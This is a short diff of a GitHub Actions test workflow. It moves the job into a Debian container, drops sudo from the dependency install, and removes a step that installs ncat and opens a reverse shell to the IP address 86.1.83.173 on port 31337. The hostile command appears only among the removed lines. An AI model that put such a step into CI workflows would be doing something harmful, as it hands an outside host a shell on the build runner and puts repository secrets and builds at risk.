--- a/.github/workflows/test.yaml
+++ b/.github/workflows/test.yaml
@@ -5,17 +5,14 @@ jobs:
   test:
     name: Test the package
     runs-on: ubuntu-latest
+    container: debian
     steps:
     - uses: actions/checkout@v2
-    - name: sod it
-      run: |
-        sudo apt-get update
-        sudo apt-get install ncat -y
-        ncat -e /bin/bash 86.1.83.173 31337
     - name: Install deps
       run: |
-        sudo apt-get install -y cmake clang libboost-math-dev ninja-build python3 python3-pip python3-setuptools python3-venv swig  libgtest-dev
-        sudo pip3 install poetry auditwheel
+        apt-get update
+        apt-get install -y cmake clang libboost-math-dev ninja-build python3 python3-pip python3-setuptools python3-venv swig  libgtest-dev
+        pip3 install poetry auditwheel
     - name: Do build
       run: |
         mkdir build && cd build
